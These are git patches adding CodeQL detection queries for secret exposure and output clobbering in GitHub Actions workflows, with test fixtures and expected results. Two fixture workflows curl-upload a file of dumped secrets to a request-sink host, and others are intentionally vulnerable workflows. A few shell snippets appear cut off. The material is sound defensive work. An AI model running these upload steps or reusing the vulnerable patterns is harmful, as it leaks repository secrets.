| 19 ++++++++++++++ .../CWE-312/.github/workflows/test1.yml | 25 +++++++++++++++++++ .../CWE-312/ExcessiveSecretsExposure.expected | 3 +++ .../CWE-312/ExcessiveSecretsExposure.qlref | 2 ++ .../CWE-312/UnmaskedSecretExposure.expected | 2 ++ .../CWE-312/UnmaskedSecretExposure.qlref | 2 ++ 9 files changed, 97 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.ql create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected create mode 100644 ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5bb94ba8a68..d9738cb74ad 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1288,9 +1288,9 @@ string getAToJsonReferenceExpression(string s, int offset) { // not just the last (greedy match) or first (reluctant match). result = s.trim() - .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + .regexpFind("(?i)tojson\\(\\s*[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", _, offset) - .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + .regexpCapture("(?i)tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", 1) } diff --git a/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql new file mode 100644 index 00000000000..c1d22e3a181 --- /dev/null +++ b/ql/src/Security/CWE-312/ExcessiveSecretsExposure.ql @@ -0,0 +1,23 @@ +/** + * @name Excessive Secrets Exposure + * @description All organization and repository secrets are passed to the workflow runner. + * @kind problem + * @problem.severity recommendation + * @id actions/excessive-secrets-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions +import codeql.actions.ast.internal.Ast + +from Expression expr +where + getAToJsonReferenceExpression(expr.getExpression(), _).matches("secrets%") + or + expr.getExpression().matches("secrets[%") and + not expr.getExpression().matches("secrets[\"%") and + not expr.getExpression().matches("secrets['%") +select expr, "All organization and repository secrets are passed to the workflow runner in $@", + expr, expr.getExpression() diff --git a/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql new file mode 100644 index 00000000000..961af6f267b --- /dev/null +++ b/ql/src/Security/CWE-312/UnmaskedSecretExposure.ql @@ -0,0 +1,19 @@ +/** + * @name Unmasked Secret Exposure + * @description Secrets derived from other secrets are not masked by the workflow runner. + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/unmasked-secret-exposure + * @tags actions + * security + * external/cwe/cwe-312 + */ + +import actions + +from Expression expr +where expr.getExpression().regexpMatch("(?i).*fromjson\\(secrets\\..*\\)\\..*") +select expr, "An unmasked secret derived from another secret may be exposed in $@", expr, + expr.getExpression() diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml new file mode 100644 index 00000000000..80f98bd57af --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/neg_test1.yml @@ -0,0 +1,19 @@ +name: secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ secrets.TOKEN }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + A_SECRET: ${{ secrets.TOKEN }} + run: echo "$A_SECRET" + - env: + A_SECRET: ${{ secrets['TOKEN'] }} + run: echo "$A_SECRET" + - env: + A_SECRET: ${{ secrets["TOKEN"] }} + run: echo "$A_SECRET" diff --git a/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml new file mode 100644 index 00000000000..614efab34c9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -0,0 +1,25 @@ +name: list-actions-secrets +on: + workflow_dispatch: +jobs: + build: + runs-on: ubuntu-latest + strategy: + matrix: + TOKENS: [WRITE, READ] + steps: + - run: | + echo '${{ toJSON(secrets) }}' > secrets.txt + curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com + - env: + ALL_SECRETS: ${{ toJSON(secrets) }} + run: echo "$ALL_SECRETS" + - env: + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + run: echo "$SOME_SECRETS" + - env: + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + run: | + echo "$username" + echo "$password" diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected new file mode 100644 index 00000000000..9d6a741ed58 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.expected @@ -0,0 +1,3 @@ +| .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:12:18:12:39 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:15:25:15:46 | toJSON(secrets) | toJSON(secrets) | +| .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | All organization and repository secrets are passed to the workflow runner in $@ | .github/workflows/test1.yml:18:26:18:72 | secrets[format('PAT_%s', matrix.TOKENS)] | secrets[format('PAT_%s', matrix.TOKENS)] | diff --git a/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref new file mode 100644 index 00000000000..45f5ad80fd9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/ExcessiveSecretsExposure.ql + diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected new file mode 100644 index 00000000000..4f309344b4b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.expected @@ -0,0 +1,2 @@ +| .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:21:22:21:72 | fromJson(secrets.AZURE_CREDENTIALS).clientId | fromJson(secrets.AZURE_CREDENTIALS).clientId | +| .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | An unmasked secret derived from another secret may be exposed in $@ | .github/workflows/test1.yml:22:22:22:76 | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | fromJson(secrets.AZURE_CREDENTIALS).clientSecret | diff --git a/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref new file mode 100644 index 00000000000..ad4c8461523 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -0,0 +1,2 @@ +Security/CWE-312/UnmaskedSecretExposure.ql + From c442f1b96b2c975811d0f473b08ecd94dae2d9cf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 6 Aug 2024 23:30:47 +0200 Subject: [PATCH 0459/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 31270d39972..75b7f0057f7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.32 +version: 0.1.33 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 99e9fac00a4..4198930865f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.32 +version: 0.1.33 groups: [actions, queries] suites: codeql-suites extractor: javascript From 473251371ba2bbffbfeed2add4e750397f6fde9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:17:36 +0200 Subject: [PATCH 0460/1267] feat(queries): Improve Output Clobbering query Add support for clobbering of `set-output` workflow command --- ql/lib/codeql/actions/Helper.qll | 13 ++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 4 +- .../security/OutputClobberingQuery.qll | 63 +++++++++++++++++++ .../Security/CWE-077/OutputClobberingHigh.ql | 1 + .../CWE-077/.github/workflows/output2.yml | 56 +++++++++++++++++ .../CWE-077/OutputClobberingHigh.expected | 18 ++++++ 6 files changed, 147 insertions(+), 8 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 2953817de6b..1d88f6f6511 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -20,7 +20,7 @@ string wrapJsonRegexp(string regex) { } bindingset[str] -private string trimQuotes(string str) { +string trimQuotes(string str) { result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") } @@ -279,6 +279,10 @@ predicate inNonPrivilegedContext(AstNode node) { inNonPrivilegedJob(node) } +string partialFileContentRegexp() { + result = ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] +} + bindingset[snippet] predicate outputsPartialFileContent(string snippet) { // e.g. @@ -286,12 +290,7 @@ predicate outputsPartialFileContent(string snippet) { // echo "FOO=$(> $GITHUB_ENV // yq '.foo' foo.yml >> $GITHUB_PATH // cat foo.txt >> $GITHUB_PATH - snippet - .regexpMatch([ - "(\\$\\(|`)<.*", - ".*(\\b|^|\\s+)" + ["cat\\s+", "jq\\s+", "yq\\s+", "tail\\s+", "head\\s+", "ls\\s+"] + - ".*" - ]) + snippet.regexpMatch(["(\\$\\(|`)<.*", ".*(\\b|^|\\s+)" + partialFileContentRegexp() + ".*"]) } string defaultBranchNames() { diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 5d0d45c26c1..aa31954ad3c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.OutputClobberingQuery private import codeql.actions.security.UntrustedCheckoutQuery /** @@ -114,7 +115,8 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { succ.asExpr() = run.getScriptScalar() and ( envToSpecialFile(["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], var_name, run, _) or - envToArgInjSink(var_name, run, _) + envToArgInjSink(var_name, run, _) or + exists(OutputClobberingSink n | n.asExpr() = run.getScriptScalar()) ) ) } diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index af8f7af089d..5a85c22bb8f 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -92,6 +92,69 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo $BODY + * echo "::set-output name=OUTPUT::SAFE" + * - id: clob2 + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * # VULNERABLE + * echo "::set-output name=OUTPUT::SAFE" + * echo $BODY + */ +class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { + WorkflowCommandClobberingFromEnvVarSink() { + exists(Run run, string output_line, string clobbering_line, string var_name | + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } +} + +class WorkflowCommandClobberingFromFileReadSink extends OutputClobberingSink { + WorkflowCommandClobberingFromFileReadSink() { + exists(Run run, string output_line, string clobbering_line | + run.getScriptScalar() = this.asExpr() and + run.getScript().splitAt("\n") = output_line and + singleLineWorkflowCmd(output_line, "set-output", _, _) and + run.getScript().splitAt("\n") = clobbering_line and + ( + // A file is read and its content is assigned to an env var that gets printed to stdout + // - run: | + // foo=$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | provenance | | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | provenance | | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | semmle.label | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | semmle.label | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:36:9:41:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +| .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | .github/workflows/output2.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:10:14:13:48 | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | # VULNERABLE\necho $BODY\necho "::set-output name=OUTPUT::SAFE"\n | +| .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | .github/workflows/output2.yml:16:18:16:49 | github.event.comment.body | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | Potential clobbering of a step output in $@. | .github/workflows/output2.yml:17:14:20:21 | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | # VULNERABLE\necho "::set-output name=OUTPUT::SAFE"\necho $BODY\n | +| .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$( Date: Wed, 7 Aug 2024 13:21:03 +0200 Subject: [PATCH 0461/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 75b7f0057f7..1edaf464fa5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.33 +version: 0.1.34 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 4198930865f..044b80d1854 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.33 +version: 0.1.34 groups: [actions, queries] suites: codeql-suites extractor: javascript From e4559e19d8f765c44a0636a7dca0bcb3d612d4c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:27 +0200 Subject: [PATCH 0462/1267] Move Output Clobbering to CWE-074 --- ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql | 4 +--- .../{CWE-077 => CWE-074}/.github/workflows/output1.yml | 0 .../{CWE-077 => CWE-074}/.github/workflows/output2.yml | 0 .../{CWE-077 => CWE-074}/OutputClobberingHigh.expected | 0 .../query-tests/Security/CWE-074/OutputClobberingHigh.qlref | 1 + .../query-tests/Security/CWE-077/OutputClobberingHigh.qlref | 1 - 6 files changed, 2 insertions(+), 4 deletions(-) rename ql/src/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.ql (93%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output1.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/.github/workflows/output2.yml (100%) rename ql/test/query-tests/Security/{CWE-077 => CWE-074}/OutputClobberingHigh.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref delete mode 100644 ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-074/OutputClobberingHigh.ql similarity index 93% rename from ql/src/Security/CWE-077/OutputClobberingHigh.ql rename to ql/src/Security/CWE-074/OutputClobberingHigh.ql index 44199a35210..c53489f9628 100644 --- a/ql/src/Security/CWE-077/OutputClobberingHigh.ql +++ b/ql/src/Security/CWE-074/OutputClobberingHigh.ql @@ -9,9 +9,7 @@ * @tags actions * security * experimental - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-074 */ import actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output1.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-077/.github/workflows/output2.yml rename to ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected rename to ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref new file mode 100644 index 00000000000..1e8b050bb9d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-074/OutputClobberingHigh.ql diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref deleted file mode 100644 index 5af047eec9e..00000000000 --- a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/OutputClobberingHigh.ql From b251c661f838a3a62ba85e6ad9c9ef26a0984858 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 13:46:50 +0200 Subject: [PATCH 0463/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1edaf464fa5..0d53b48ef11 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.34 +version: 0.1.35 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 044b80d1854..ade19bd63ee 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.34 +version: 0.1.35 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1750ebac18b8a96fa0a23b62079e71744782f90d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:09:50 +0200 Subject: [PATCH 0464/1267] fix(controlcheck): Improve checks for actors --- .../codeql/actions/security/ControlChecks.qll | 16 ++++-- .../CWE-074/.github/workflows/output2.yml | 8 ++- .../CWE-074/OutputClobberingHigh.expected | 3 ++ .../CWE-829/.github/workflows/dependabot3.yml | 52 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 4 ++ 5 files changed, 77 insertions(+), 6 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 90a989c1a16..2d8e60dca37 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -122,17 +122,23 @@ class LabelIfCheck extends LabelCheck instanceof If { class ActorIfCheck extends ActorCheck instanceof If { ActorIfCheck() { - // eg: github.actor == 'dependabot[bot]' - // eg: github.triggering_actor == 'CI Agent' - // eg: github.event.pull_request.user.login == 'mybot' + // eg: github.event.pull_request.user.login == 'admin' exists( normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", - "\\bgithub\\.event\\.comment\\.user\\.login\\b", "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.head_commit\\.author\\.name\\b", + "\\bgithub\\.event\\.commits.*\\.author\\.name\\b" ], _, _) ) + or + // eg: github.actor == 'admin' + // eg: github.triggering_actor == 'admin' + exists( + normalizeExpr(this.getCondition()) + .regexpFind(["\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b",], _, _) + ) and + not normalizeExpr(this.getCondition()).matches("%[bot]%") } } diff --git a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml index fa2375d73f8..614de61b0cb 100644 --- a/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml +++ b/ql/test/query-tests/Security/CWE-074/.github/workflows/output2.yml @@ -49,8 +49,14 @@ jobs: # VULNERABLE cat pr-number echo "::set-output name=OUTPUT::SAFE" - - id: clob2 + - id: clob3 run: | # VULNERABLE echo "::set-output name=OUTPUT::SAFE" ls *.txt + - id: clob4 + run: | + # VULNERABLE + CURRENT_VERSION=$(cat gradle.properties | sed -n '/^version=/ { s/^version=//;p }') + echo "$CURRENT_VERSION" + echo "::set-output name=OUTPUT::SAFE" diff --git a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected index 72eb314cb32..b6cb2a32e47 100644 --- a/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected +++ b/ql/test/query-tests/Security/CWE-074/OutputClobberingHigh.expected @@ -6,6 +6,7 @@ edges | .github/workflows/output2.yml:36:9:41:6 | Uses Step | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -19,6 +20,7 @@ nodes | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | @@ -28,3 +30,4 @@ subpaths | .github/workflows/output2.yml:42:14:46:48 | # VULNERABLE\nPR="$(> $GITHUB_OUTPUT + fi + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Merge Dependabot pull request + if: steps.set-milestone.outputs.mergeEnabled + run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase + env: + GH_TOKEN: ${{ secrets.GH_ACTIONS_REPO_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 93e816fe1f9..d5ad134c976 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -59,6 +59,9 